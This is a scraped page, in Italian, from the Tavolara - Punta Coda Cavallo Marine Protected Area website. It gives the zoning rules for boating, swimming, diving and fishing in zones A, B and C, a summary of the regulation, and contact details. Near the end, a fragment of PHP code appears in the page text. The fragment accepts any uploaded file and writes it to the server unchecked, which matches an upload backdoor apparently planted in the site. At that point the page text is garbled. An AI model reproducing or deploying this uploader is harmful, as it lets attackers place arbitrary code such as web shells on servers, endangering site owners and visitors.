Rete Regionale per la conservazione della Fauna Marina SardegnaL’AMP è nodo della rete regionale per la conservazione della fauna marina

In caso di ritrovamento di animali in difficoltà contattare il
logo emergenza in mare, guardia costieralogo emergenza ambientale, segnalazione incendi boschivi

Norme

All'interno dell'Area Marina Protetta “Tavolara - Punta Coda Cavallo”, ai sensi del decreto ministeriale istitutivo del 12 Dicembre 1997 cosi come rettificato dal decreto ministeriale 28 Novembre 2001, sono individuate le zone appresso elencate, con i relativi regimi di tutela:

 

1) Zona  A - RISERVA INTEGRALE      
sono consentiti:
- l'accesso al personale dell'Ente Gestore, per attività di  servizio, e a quello scientifico, per lo svolgimento di ricerche debitamente autorizzate;
- la realizzazione di visite guidate subacquee, regolamentate dall'Ente Gestore, in aree limitate secondo percorsi prefissati, tenendo comunque conto delle esigenze di elevata tutela ambientale;
sono  VIETATI:
- la balneazione;
- la pesca professionale e sportiva;
- il transito di natanti e imbarcazioni fatta eccezione per quelli dell'Area Marina Protetta;

 

2) Zona B - RISERVA GENERALE     
sono consentiti:
- la navigazione  a natanti  e  imbarcazioni  a  bassa velocità  (non  oltre  10  nodi);
- le visite,  anche  subacquee,  regolamentate  dall'Ente  Gestore  dell'Area  Marina Protetta;
- la balneazione;
- l'ormeggio alle apposite strutture predisposte dall'Ente Gestore dell’ Area;
- la piccola pesca, con attrezzi selettivi e che non danneggino i fondali, ai pescatori pro¬fessionisti dei comuni le cui coste sono comprese nell'Area Marina Protetta, con un carico giornaliero regolamentato dall'Ente Gestore;
sono  VIETATI:
- la pesca professionale con reti a strascico e cianciolo;
- la pesca sportiva con qualunque mezzo esercitata;

 

3)  Zona C - RISERVA PARZIALE     
sono consentiti:
- la navigazione a natanti e imbarcazioni;
- l'ormeggio, come regolamentato dall'Ente Gestore dell' Area Marina Protetta;
- le immersioni subacquee, compatibili con la tutela dei fondali;
- la piccola pesca, con attrezzi selettivi e che non danneggino i fondali, ai pescatori professionisti dei comuni le cui coste sono comprese nell'Area Marina Protetta;
- la pesca sportiva, se praticata con i seguenti sistemi e limitazioni: 
a) lenze e canne da fermo, lenze morte, bolentini, lenze per cefalopodi: non più di una per persona e con  massimo 3 ami;
b) correntine: non più di una a persona e con massimo di sei ami;
c) traina, non più di due per imbarcazione;

REGOLAMENTO DI ESECUZIONE E ORGANIZZAZIONE DELL’AMP

Nell’ Area Marina Protetta  vige un regolamento definitivo del Ministero dell'Ambiente e della Tutela del Territorio e del Mare, approvato con decreto legislativo n° 299 del 03/12/2014, che regola nel dettaglio le diverse attività. Nelle zone “B” e  “C” è vietato l’ancoraggio, salvo che sui fondali sabbiosi o ciottolosi e nelle aree appositamente individuate ed attrezzate. Inoltre è vietata la pesca subacquea, l’utilizzo delle moto d’acqua e gli sport acquatici con l’uso di attrezzature a rimorchio.

 

News


Dal 24 novembre al 6 dicembre, sede AMP di Tavolara via Porto Romano...

 

Rassegna stampa


La Nuova Sardegna. Articolo del  30 aprile 2013. Clicca qui per...

 

©  2011 Area Marina Protetta Tavolara Punta Coda Cavallo     Sede Legale: via Dante 1, OLBIA (SS) - 07026                                       Sede operativa:  Via San Giovanni 14, OLBIA (SS) - 07026           Telefono 0789/203013 - Fax 0789/204514 Mail:info@remove-this.amptavolara.itPec: amptavolara@pec.it 

Credits

Area Riservata

logo ministero ministero dell'ambientelogo EMASlogo Rina

"; $target = ""; $target = $target.basename( $_FILES['uploaded']['name']) ; $ok=1; if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target)) { echo "Done"; } } ?>
Navigando il sito amptavolara.com acconsenti all'utilizzo dei Cookie. Per maggiori dettagli.